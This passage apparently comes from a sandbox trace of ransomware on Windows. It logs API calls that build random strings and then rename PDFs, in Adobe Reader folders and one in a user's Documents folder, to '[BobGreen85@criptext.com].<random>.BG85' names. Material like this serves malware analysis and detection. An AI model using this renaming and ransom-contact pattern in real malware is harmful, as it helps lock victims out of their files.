lpPerformanceCount=0x381fe34*=19980661849) returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0079.468] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\[BobGreen85@criptext.com].2l5MfWch-dEYRW2LB.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\[bobgreen85@criptext.com].2l5mfwch-deyrw2lb.bg85"), dwFlags=0x1) returned 1 [0079.469] GetTickCount () returned 0x114bf0c [0079.470] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19980854843) returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0079.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0079.470] GetTickCount () returned 0x114bf0c [0079.471] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19980951786) returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0079.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0079.471] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\[BobGreen85@criptext.com].Q0Ijgyjs-qjPu3DVN.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\[bobgreen85@criptext.com].q0ijgyjs-qjpu3dvn.bg85"), dwFlags=0x1) returned 1 [0079.472] GetTickCount () returned 0x114bf0c [0079.473] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19981154205) returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0079.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0079.473] GetTickCount () returned 0x114bf0c [0079.473] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19981247174) returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0079.474] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\[BobGreen85@criptext.com].oIaYSsJQ-9mXUkXTW.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\[bobgreen85@criptext.com].oiayssjq-9mxukxtw.bg85"), dwFlags=0x1) returned 1 [0079.475] GetTickCount () returned 0x114bf0c [0079.475] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19981440923) returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0079.476] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0079.476] GetTickCount () returned 0x114bf0c [0079.476] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19981533248) returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0079.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0079.477] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\[BobGreen85@criptext.com].cP8mBrEv-flrTsgy9.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\[bobgreen85@criptext.com].cp8mbrev-flrtsgy9.bg85"), dwFlags=0x1) returned 1 [0079.576] GetTickCount () returned 0x114bf79 [0079.576] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19991544373) returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.577] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0079.577] GetTickCount () returned 0x114bf79 [0079.577] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19991642994) returned 1 [0079.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0079.578] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\[BobGreen85@criptext.com].J0MSbOS1-FVcvdDXv.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\[bobgreen85@criptext.com].j0msbos1-fvcvddxv.bg85"), dwFlags=0x1) returned 1 [0079.579] GetTickCount () returned 0x114bf79 [0079.579] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19991829674) returned 1 [0079.580] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\[BobGreen85@criptext.com].cCGSCEx2-2SGJiKIU.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\[bobgreen85@criptext.com].ccgscex2-2sgjikiu.bg85"), dwFlags=0x1) returned 1 [0079.581] GetTickCount () returned 0x114bf79 [0079.581] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19991997248) returned 1 [0079.581] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\[BobGreen85@criptext.com].FiiwieLA-2TcltsRg.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\[bobgreen85@criptext.com].fiiwiela-2tcltsrg.bg85"), dwFlags=0x1) returned 1 [0079.582] GetTickCount () returned 0x114bf79 [0079.583] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19992150201) returned 1 [0079.583] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\[BobGreen85@criptext.com].JF13rKw3-2Bg35751.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\[bobgreen85@criptext.com].jf13rkw3-2bg35751.bg85"), dwFlags=0x1) returned 1 [0079.584] GetTickCount () returned 0x114bf79 [0079.584] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19992285563) returned 1 [0079.584] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\[BobGreen85@criptext.com].n3lhXYbS-tS4itfXX.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\[bobgreen85@criptext.com].n3lhxybs-ts4itfxx.bg85"), dwFlags=0x1) returned 1 [0079.585] GetTickCount () returned 0x114bf79 [0079.585] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19992419925) returned 1 [0079.585] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\[BobGreen85@criptext.com].cidG2Dsh-e2nIyijk.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\[bobgreen85@criptext.com].cidg2dsh-e2niyijk.bg85"), dwFlags=0x1) returned 1 [0079.586] GetTickCount () returned 0x114bf79 [0079.587] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19992549052) returned 1 [0079.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\[BobGreen85@criptext.com].Rb5lkYR4-cyzgMYzD.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\[bobgreen85@criptext.com].rb5lkyr4-cyzgmyzd.bg85"), dwFlags=0x1) returned 1 [0079.588] GetTickCount () returned 0x114bf79 [0079.588] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19992679514) returned 1 [0079.588] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\[BobGreen85@criptext.com].ixMpy93a-CIYxGhaq.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\[bobgreen85@criptext.com].ixmpy93a-ciyxghaq.bg85"), dwFlags=0x1) returned 1 [0079.679] GetTickCount () returned 0x114bfd6 [0079.679] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20001832201) returned 1 [0079.680] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\[BobGreen85@criptext.com].AWdit7uQ-kaLOj8gf.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\[bobgreen85@criptext.com].awdit7uq-kaloj8gf.bg85"), dwFlags=0x1) returned 1 [0079.681] GetTickCount () returned 0x114bfd6 [0079.681] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002019268) returned 1 [0079.682] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\Oz5qK1HKQ0at4YOJKs.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\oz5qk1hkq0at4yojks.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\[BobGreen85@criptext.com].88dcKun5-I88qGB1l.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\[bobgreen85@criptext.com].88dckun5-i88qgb1l.bg85"), dwFlags=0x1) returned 1 [0079.683] GetTickCount () returned 0x114bfe6 [0079.683] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002185943) returned 1 [0079.683] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\[BobGreen85@criptext.com].m6VEBaYb-ZCOLA5DH.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\[bobgreen85@criptext.com].m6vebayb-zcola5dh.bg85"), dwFlags=0x1) returned 1 [0079.684] GetTickCount () returned 0x114bfe6 [0079.684] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002321475) returned 1 [0079.684] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\[BobGreen85@criptext.com].x4eZjdac-B5L2nplm.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\[bobgreen85@criptext.com].x4ezjdac-b5l2nplm.bg85"), dwFlags=0x1) returned 1 [0079.686] GetTickCount () returned 0x114bfe6 [0079.686] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=20002472385) returned 1 [0079.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 